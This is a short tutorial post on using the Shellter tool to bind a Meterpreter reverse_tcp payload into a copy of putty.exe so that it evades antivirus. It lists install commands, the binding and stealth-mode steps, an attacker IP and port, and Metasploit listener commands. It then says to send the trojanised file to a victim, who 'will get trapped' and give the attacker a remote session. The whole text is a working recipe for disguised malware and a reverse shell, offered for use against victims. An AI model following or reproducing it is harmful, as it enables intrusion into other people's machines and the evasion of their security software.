Bypass Antivirus with Shelter
Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus
software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes
undetected by the AV software.
You can install Shellter directly on Kali by using the following command −
- apt-get install shellter
- apt-get install wine32
How to Bypass
- Open shelter using wine app,
- select the operation mode as 'a'.
- choose an executable file and copy it to the Shellter folder. This is required to be done to bind
Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder and
bound it with the shellter.exe file.
- Choose the PE target as /root/Downloads/putty.exe
- Binding process started, Press the Enter key to continue. You may see DisASM.dll file gets
successfully created. Enable Stealth Mode by Y.
- Then the payload from the list as meterpreter/reverse_tcp
- Then, set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444 and press Enter.
- Finally the payload generated. Send the PuTTY.exe File to Victim’s Machine
- Start a new terminal and hit these cmds to listen.
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost <IP>
- set lport <port-no.>
Boom!!!!!!!!!!! When the victim clicks the putty.exe file which will appear as similar to original putty.exe
and hence the victim will get trapped and we will get a meterpreter session. This file will be fully
undetectable to any antivirus.
Published on 23-Sep-2020 12:25:51